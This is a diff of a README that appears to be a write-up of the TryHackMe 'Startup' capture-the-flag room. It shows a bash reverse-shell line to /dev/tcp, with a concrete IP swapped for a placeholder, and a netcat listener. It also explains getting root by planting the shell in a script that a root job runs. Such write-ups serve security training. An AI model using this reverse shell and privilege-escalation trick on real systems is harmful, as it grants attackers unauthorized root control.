olezim/writeups/tryhackme/startup/readme.md

 ```
 $ cat /etc/print.sh
 #!/bin/bash
-/bin/bash -i >& /dev/tcp/10.9.251.98/4444 0>&1
+/bin/bash -i >& /dev/tcp/<ATTACKER-IP>/4444 0>&1
 $
 ```
 The problem: print.sh or planner.sh need to be executed as root if we want to receive a root-shell.
-The key:
-The startup_list.txt seems to get updated every minute or so.
-Assuming there is a service, running as root, executing the planner.sh file which modifies the .txt file, we would need to just wait until the next execution cycle.
-Remember, if planner.sh gets executed as root, our print.sh gets also executed as root, sending a reverse shell back to us.
-Lets set up an appropriate listener and wait for it.
+The key: The startup_list.txt seems to get modified every minute or so.
+Assuming there is a service, running as root, executing the planner.sh script, which modifies the .txt file and would also execute print.sh, we would just need to wait for the next cycle.
+If print.sh gets executed as root, we will retrieve a root-shell.
 `user@parrot ~ $ nc -lvnp 4444`

 It worked.
 We are root.